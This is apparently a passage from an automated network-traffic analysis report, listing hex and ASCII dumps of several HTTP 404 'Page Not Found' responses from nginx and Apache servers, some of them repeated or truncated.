6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: W/"6b40108-56e-561ca595b5880"Content-Encoding: gzipData Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl**?z(ZLfA3Nw`<)Fdxc)\*3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: W/"6b40108-56e-561ca595b5880"Content-Encoding: gzipData Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl**?z(ZLfA3Nw`<)Fdxc)\*3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:56 GMTContent-Type: text/htmlContent-Length: 1390Connection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: "6b40108-56e-561ca595b5880"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 d1 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 6d 63 6c 6f 67 6f 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 6a 70 67 22 20 61 6c 74 3d 22 cc e0 ea f5 ee f1 f2 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 62 72 3e 3c 62 72 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 62 72 3e 43 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 48 31 3e 3c 62 72 3e 0a dd f2 e0 20 f1 f2 f0 e0 ed e8 f6 e0 20 f1 e3 e5 ed e5 f0 e8 f0 ee e2 e0 ed e0 20 e0 e2 f2 ee ec e0 f2 e8 f7 e5 f1 ea e8 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e f5 ee f1 f2 e8 ed e3 ee ec 20 cc e0 ea f5 ee f1 f2 3c 2f 61 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:02 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:04 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:06 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
